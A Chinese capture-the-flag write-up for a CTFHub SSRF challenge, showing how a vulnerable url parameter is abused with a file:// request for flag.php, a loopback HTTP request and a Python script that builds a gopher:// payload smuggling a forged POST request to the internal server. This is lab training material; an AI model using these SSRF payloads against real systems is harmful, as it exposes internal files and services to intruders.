CTFHUB-SSRF-POST请求

通过file协议访问flag.php文件内容

复制代码
?url=file:///var/www/html/flag.php

右键查看页面源代码

需要从内部携带key发送post数据包即可获得flag

复制代码
?url=http://127.0.0.1/flag.php

得到了key

构造POST请求数据包,进行url编码(新建一个txt文件,输入以下内容保存,修改为python文件,重命名为gopher.py

python 复制代码
# -*- coding: utf-8 -*
import urllib.parse
payload =\
"""
POST /flag.php HTTP/1.1
Host: 127.0.0.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 36

key=d554812847363980d21b2b1b87733501
"""
tmp = urllib.parse.quote(payload)
new = tmp.replace('%0A','%0D%0A')
result = 'gopher://127.0.0.1:80/'+'_'+new
result = urllib.parse.quote(result)
print(result)

在命令行窗口执行

复制代码
python gopher.py

通过Gopher协议发送请求,得到了flag

复制代码
?url=gopher%3A//127.0.0.1%3A80/_%250D%250APOST%2520/flag.php%2520HTTP/1.1%250D%250AHost%253A%2520127.0.0.1%250D%250AContent-Type%253A%2520application/x-www-form-urlencoded%250D%250AContent-Length%253A%252036%250D%250A%250D%250Akey%253Dd554812847363980d21b2b1b87733501%250D%250A
相关推荐
我叫罗叨叨14 小时前
Sonnet 5 / GPT-5.6 / Gemini 3.5:旗舰模型的定义,已经变了
经验分享
学数学的口心贝15 小时前
从零搭建并维护个人主页
经验分享·笔记
Bomangedd15 小时前
MCM08重载模组技术解析
经验分享·规格说明书
富唯智能15 小时前
复合机器人核心技术|富唯全栈自研软硬件一体化解决方案
经验分享
一个人旅程~15 小时前
欧文·亚隆的《当尼采哭泣》(When Nietzsche Wept)精简总结
经验分享·笔记·新浪微博
磐时信息技术15 小时前
GB 44495/44496正式施行:智能网联汽车信息安全与软件升级进入强制合规阶段
网络安全·信息安全·汽车·gb44495·gb44496
法雅特吉他16 小时前
国产吉他品牌技术发展与市场格局分析
大数据·经验分享·新媒体运营·学习方法·流量运营·材质·内容运营
智者知已应修善业17 小时前
【P12159蓝桥杯数组翻转】2025-4-24
c语言·c++·经验分享·笔记·算法·蓝桥杯
被克制了1 天前
安全协议设计与分析(2)
网络安全·密码学·安全协议
dexi.Chi 攻城狮1 天前
SQL层次查询语法
经验分享·笔记·sql